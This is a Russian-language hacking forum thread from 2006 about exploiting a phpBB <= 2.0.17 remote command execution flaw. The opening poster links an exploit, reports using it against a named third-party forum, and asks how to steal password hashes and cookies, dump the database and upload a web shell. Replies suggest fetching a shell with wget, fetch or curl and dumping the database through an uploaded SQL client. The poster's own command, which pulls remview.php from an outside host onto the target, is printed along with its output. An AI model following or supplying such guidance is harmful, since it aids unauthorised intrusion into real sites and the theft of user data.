Форумы phpBB <= 2.0.17

Discussion in 'Уязвимости CMS/форумов' started by Dimazzz, 17 May 2006.

Thread Status:
Not open for further replies.
  1. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    phpBB <= 2.0.17
    Цель: выполнение произвольных команд на сервере(php-inj)
    Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
    Exploit: http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>"


    Я использовал эту уязвимость на форуме http://www.abbadon.ru/f/ вроде все получилось.
    У меня вопрос можно ли какой нить командой узнать хеш пользователя, или слить базу, и возможно еще залить shell? объясните плиз.
     
  2. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    так этож уязвимость представляет собой php injection
    так что базу слить канечно можно в любом случае, вот шел записать только если прав хватит, логично?
    не в тему но всеже скажу
    хреновый канечно у нас FAQ по phpbb чисто реклама рст, ни какой информативности :( мля
    кстати еще от себя скажу что странно вроде там php 5.1 а GLOBALS через GET всеравно работает.
     
  3. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    какой командой можно базу слить?
    или шел залить

    может я просто не так делаю :) не ругайтесь ;)


    C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ тут_команда

    или это делается пл другому?
     
  4. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    А команда простая wget http://путь_к шелу.
    И он зальётся.
     
  5. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ wget http://probnii.newmail
    .ru/remview.php
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Done. User 234558372 successfully registered!

    и дальше вылетает непонятный большой код как будто главной страници :(
    может что я сто то неправильно делаю

    захожу в командную строку.
    иду к папке с перлом и от туда запускаю сплоит.
    и дальше C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ команда

    чет неполучается ;( сайт http://www.abbadon.ru/f/
     
  6. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    попробуй без сплоита делать тогда быстрее во всем разберешся
     
  7. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    какким образом ? объясни пожалуйста. Мне просто у этого форума куки нужно выдрать или базу. Вобщем получить достут можно даже без админки.
     
  8. nytros

    nytros New Member

    Joined:
    5 Jan 2006
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0

    А может там wget нету а чтото другое и шел не залился.Попробуй вместо wget fetch ili curl вставить.
     
  9. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    вот здесь
    http://www.hardened-php.net/advisory_172005.75.html
    первое описание баги челом который её нашел, к томуже подскажу что вся фишка в файле
    includes/usercp_register.php
     
    #9 ShAnKaR, 17 May 2006
    Last edited: 17 May 2006
  10. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    эффект тот же ни чего не происходит как будто что то не так делаю
     
  11. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    ссылки не вижу ? И в это файле вот что "Hacking attempt"

    Загадками говориш ;))
     
  12. ShAnKaR

    ShAnKaR Пачка маргарина

    Joined:
    14 Jul 2005
    Messages:
    904
    Likes Received:
    297
    Reputations:
    553
    ребята я просто хочу чтоб вы не пользовались тупо сплоитами, а и головой думали
    я исправил немного скрипт чтоб сплоит рст там не пахал
     
    #12 ShAnKaR, 17 May 2006
    Last edited: 17 May 2006
  13. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Так сплойт только для 5 пхп вроде или я ошибаюсь ?
     
    _________________________
  14. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Ну у меня тогда такой вопрос каим образом можно базу слить?
    И можно ли е слить через сплоит из командной стоки Windows
     
  15. nytros

    nytros New Member

    Joined:
    5 Jan 2006
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Нужно sql клиент(шел) залить конечно пароли к БД и dump сделаеш.

    А база там не меньше 500МБ сможеш слить,а и зачем тебе.
     
    #15 nytros, 17 May 2006
    Last edited: 17 May 2006
  16. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Стукни мне 323945339
     
  17. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Ну у кого нить хоть получится сделать http://www.abbadon.ru/f/

    Я никак не могу в командах разобраься и цпуе пробовал и др шелл никак не могу залить может я что то не так делаю, подскажите.
     
  18. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Именно то, что тебе надо проще всего в этой версии через хсс реализовать... А чем кстати тебе этот форум не угодил, что ты сразу две темы про него создал? Если не секрет конечно. )
     
  19. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    Я его версию не знаю? вот тоже в чем проблема.
     
  20. Dimazzz

    Dimazzz Elder - Старейшина

    Joined:
    22 Nov 2005
    Messages:
    172
    Likes Received:
    19
    Reputations:
    1
    когда shell запускаю из CMD команда ls и некоторые другие работают файлы показывают . А вот какая команда и как ее правильно писать чтобы шелл залить не знаю. И как слить базу тоже не занаю. Хеш нужен тоже но Xss не подходит. Вот и прошу подсказать как правильно команды написать.
     
Thread Status:
Not open for further replies.